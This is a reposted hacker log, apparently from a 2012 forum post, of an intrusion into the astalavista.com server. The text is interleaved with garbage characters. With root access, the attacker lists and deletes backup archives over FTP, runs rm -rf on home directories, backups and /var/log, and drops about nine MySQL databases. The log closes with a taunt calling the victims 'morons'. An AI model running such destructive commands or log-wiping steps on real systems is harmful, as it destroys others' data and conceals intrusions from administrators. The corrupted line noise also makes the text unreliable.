" V r$ P: I2 d# Q3 \, x) j250 CWD command successful.
6 \, U. R7 V! l% T, d# z/ ?) ^6 \ftp> ls -la
0 ?# u5 V+ k2 T8 O& j227 Entering Passive Mode (212,254,194,163,2,189)
8 v+ z2 P" t( l150 Opening BINARY mode data connection for ‘file list’.
$ f8 k; B! P5 W. ~- M-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
# Y @6 v' ~/ E% T- z1 Z-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2; i- H7 p# o" I" W6 @" x) i3 k
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
7 ~- c8 `7 p( w3 {1 I) j" ^+ B& R8 {-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar& W' ~ v, P% ^
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar" w8 K: p4 h \9 ]$ x2 k# q
[snip]; q. C7 u- S) G' b f/ g0 w
226 Transfer complete.
( [8 f- L1 {0 a1 Z( m X: vftp> mdelete *! U$ C9 ?8 m! @ V3 f# B4 B
ftp> ls -la2 O1 O: q3 [6 ~3 P6 k8 H G; c
227 Entering Passive Mode (212,254,194,163,2,193)
$ A8 B: X# |+ c150 Opening BINARY mode data connection for ‘file list’.5 Q2 G8 A* H/ j9 i
226 Transfer complete.
+ Y" v) J- {. g& U9 q4 j; Oftp>
7 B& i- O" A: T" \5 V1 } p9 r' C( K& Z
sh-3.2# cd /home# x- Y, i ^& r4 x/ H6 m; h
sh-3.2# ls -la: c& n4 H; H2 [/ m$ z
total 1207 E7 ~0 I) ^. C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
3 e T. P% x% h# [drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
; S" O4 l# Y) g* p, m$ k3 Kdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin- q4 p8 k; R0 [+ H a; P
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
% y, l' Q6 N1 D& e& K& x+ t-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
3 L, h: ~ } z) xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet* D' J4 z8 N/ C4 V6 z) i6 t/ w' Z
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup% h1 L w7 P6 H& A
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
: q: J( W% d' i7 j; D4 e" N+ Zdrwx–x–x 10 com com 4096 Apr 28 12:40 com
# U$ c, u9 |" gdrwxr-xr-x 2 root root 4096 May 17 2007 ftp; X, F3 |# I# E/ h( R4 c
drwx—— 3 jon jon 4096 Sep 21 2007 jon
. S1 X3 j4 z3 i& b: Vdrwx—— 2 root root 16384 Sep 11 2007 lost+found9 Q4 s& x- c+ x4 I; q6 N
drwxr-xr-x 2 root root 4096 Sep 14 2007 my& U1 C0 v y* {) K) H: C1 j0 t
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata* a# `/ z: r0 i5 b5 M) l
drwx—— 2 jon jon 4096 Sep 15 2007 test
" q& x: d& l" A Zdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp- r6 }* H7 X! o7 K$ t! e! } e
: n! R) w$ M9 N# V. V1 v
sh-3.2# rm -rf backup/1 o7 P5 y c' {3 p
sh-3.2# rm -rf backup.14161/
. L! E& M" S. `1 wsh-3.2# rm -rf ftp/
% {: v. Z9 J Y" ~$ b: jsh-3.2# rm -rf jon/
7 W& R/ k4 b+ E9 i0 d% osh-3.2# rm -rf my/% y1 B# [. Q" ^- {( G4 c
sh-3.2# rm -rf mysqldata/8 J4 b3 f( i: Q! t
sh-3.2# rm -rf test/
, z7 ?" V0 R csh-3.2# rm -rf tmp/( ~. ~1 u$ w+ O( f% N( v
sh-3.2# cd ~3 v6 f' e4 V4 ?9 M$ L6 T% [ C7 R. g
sh-3.2# rm -rf *
; K& ]$ s$ g: f/ L: G1 z7 C( n4 H' [1 Dsh-3.2# rm -rf /var/log/& y2 k: e1 y) `/ t; H" [$ y' ~
rm: cannot remove directory `/var/log//proftpd’: Directory not empty6 k; I0 x* A% Z) f( A
sh-3.2# rm -rf /home/*6 ]& @. l+ h# V; {( J- H& g
sh-3.2# mysql) k$ S9 Z' _% N
Welcome to the MySQL monitor. Commands end with ; or \g." c8 s7 H& V/ K k' \
Your MySQL connection id is 407156
|1 j2 f; w! FServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 V2 [9 J2 U9 k* R" h& h
9 R! A0 ?0 i: G& y' PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! e3 I9 f# T, C* T" u2 A* \% N. P2 b
mysql> show databases;
% K8 F7 ]; A" S( z+———————–+% ?+ u/ Z, O# i2 ]
| Database |
& g8 s8 M% |+ g+———————–+& n4 a$ i! A. O6 Y x/ I
| information_schema |% ~# T+ S! A0 ]0 v" A
| astanet_ads |
6 u. n3 F& p2 X| astanet_mailing_lists |
# z$ ~6 `; K' E| astanet_mediawiki |& E2 U0 S+ D: O% M! I5 [
| astanet_membersystem |# Q- Z& n# c K/ N
| com_contrexx |
* M. m- b: {! y( [3 Z* b4 q+ M| com_contrexx2 |
) Q |0 l6 P) W| com_contrexx2_live |
9 e. c# y7 I O) N5 _| da_roundcube |
4 t P, F, H% a| dolphin |5 \- O7 k- I$ X
| ideapool |
; i2 D L9 }1 ~) `/ ]! b| mysql |5 m D& v( n8 |. L1 m0 f( o7 ?, S* k
| test |
7 P' n; p; ]' l! j1 u2 H| yourmaster |9 n, O6 B' t: M* F
+———————–+
8 a3 I0 Y. p2 [# O14 rows in set (0.03 sec)5 |+ { t; _* P+ y7 {9 B ?$ r
$ \7 M& v: E7 I* W/ K4 |
mysql> drop database astanet_membersystem;
2 E2 t9 {' R) l6 LdroQuery OK, 46 rows affected (0.81 sec)
2 t! |" Y/ e& S9 \( l9 s
& B3 o* | d: m7 h& Y1 bmysql> drop database com_contrexx;0 w1 Y, ]7 A* u9 H" a" {% {# o& q+ t
Query OK, 211 rows affected (2.72 sec)0 i5 @; H* L" V6 V& d6 q& D
% E# t0 d% F4 M, C6 R3 }8 N8 a' Lmysql> drop database com_contrexx2;0 _/ T7 I v1 {( x; E
Query OK, 237 rows affected (2.23 sec)0 D# c4 T7 F8 Y" S: r
. X9 A+ l- q( _& jmysql> drop database com_contrexx2_live;; s- x3 q! r7 F
Query OK, 227 rows affected (7.63 sec)
& s* b) D1 I' ]4 A" r2 {2 E" a9 ~& B
mysql> drop database ideapool;
. }( x/ C# X8 z( F+ ?Query OK, 69 rows affected (0.19 sec)
$ ?& D6 r0 ?2 y, o# X7 ^! n4 G, M" V* E
mysql> drop database yourmaster;2 Y2 d9 ^( M* \
Query OK, 158 rows affected (0.55 sec) i1 g8 {5 O5 F1 `! D1 [
6 I( @7 t' X0 Y0 Imysql> drop database astanet_ads;# |0 s. h5 b5 m' `7 t+ t0 y6 L
Query OK, 9 rows affected (0.11 sec)
1 m) q1 l8 s: n
" P4 w' I' F! k- l& W* [mysql> drop database astanet_mailing_lists;9 \. _/ f7 G$ _! G S3 C
Query OK, 24 rows affected (1.47 sec)
' ~+ w: L& g3 P& R( T; t7 L4 |) y6 v3 w
mysql> drop database astanet_mediawiki;/ B" s& _# ]/ X- J
Query OK, 31 rows affected (0.51 sec)6 p# \8 G. @' B- T; p
* R" y D" p F# O! f4 u" G+ [4 ]' _mysql> show databases;
3 d8 I0 [! D4 K+——————–+$ O! r0 ]* u9 U, ?% \: I; {
| Database |
2 q( Z2 X7 p7 f v9 `+——————–+
! ?& C$ @7 i5 h0 ~, j4 m| information_schema |. Z& w1 r0 p' ?3 |# q- f
| da_roundcube |8 f6 W- C% l2 ^4 i6 `! }; }
| dolphin |
2 @& K5 Q' ~9 W8 w7 n4 h" p| mysql |" t6 f4 K1 h2 N# {
| test |
0 ^/ }2 S: ~9 v+——————–+' s) m- c& J" n+ B4 U6 i* Q7 K
5 rows in set (0.00 sec)" f$ {4 l o; C& }; i
5 q& y O3 v Z; z$ B6 r
What a journey! We’re not sure exactly why the “Terminator” had any influence on) I0 M5 E0 D* W
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
. [6 u w y1 L: cwrong to say this pack of morons *wont be back*.9 ^! E" D" [$ M3 L. b( V+ v
|
发表于 2012-11-6 21:07:34
收藏
支持
反对